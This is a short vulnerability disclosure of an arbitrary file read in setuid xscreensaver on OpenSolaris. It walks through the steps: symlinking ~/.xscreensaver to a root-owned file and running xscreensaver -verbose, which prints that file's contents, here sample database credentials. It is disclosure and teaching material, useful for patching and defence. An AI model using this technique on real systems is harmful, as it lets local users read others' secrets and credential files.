xscreensaver local arbitrary file disclosure | symlink attack

xscreensaver local arbitrary file disclosure | symlink attack

The "xscreensaver" program distributed normally with Xorg can be abused
to disclose local files owned by other users (also of the root account).
Xscreensaver has the setuid bit on by default (Example: Opensolaris)
The xscreensaver program uses the file ~/.xscreensaver to read configuration
options from. If this file is a symlink to another file then this file is parsed
and output is shown on the display. It has to be noted that during the parsing
of the file it may be possible that not the full file contents will be shown.

Here is an example attack scenario on an Opensolaris default install (with Xorg):

kcope@opensolaris:~# ls -la /root/db.php && cat /root/db.php
-rw------- 1 root root 61 Dez 27 17:59 /root/db.php
$db_user = "root";
$db_pass = "secret";

kcope@opensolaris:~$ ln -s /root/db.php ~/.xscreensaver
kcope@opensolaris:~$ ls -la ~/.xscreensaver
lrwxrwxrwx 1 kcope staff 12 1986-12-27 18:01 /export/home/kcope/.xscreensaver -> /root/db.php

kcope@opensolaris:~$ xscreensaver -verbose
xscreensaver 5.01, copyright (c) 1991-2006 by Jamie Zawinski <[email protected]>.
xscreensaver: running as kcope/staff (101/10); effectively root/staff (0/10)
xscreensaver: in process 2186.
xscreensaver: /export/home/kcope/.xscreensaver:1: unparsable line: $db_user = "root";
xscreensaver: /export/home/kcope/.xscreensaver:2: unparsable line: $db_pass = "secret";
xscreensaver: 18:02:26: running /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper: No such file or directory
xscreensaver: 18:02:26: /usr/X11/lib/xscreensaver/bin/xscreensaver-gl-helper did not report a GL visual!
…
…
…

As one can see in the above output the contents of the root owned file
db.php is shown in the
xscreensaver output.

Best Regards,

Nikolaos Rangos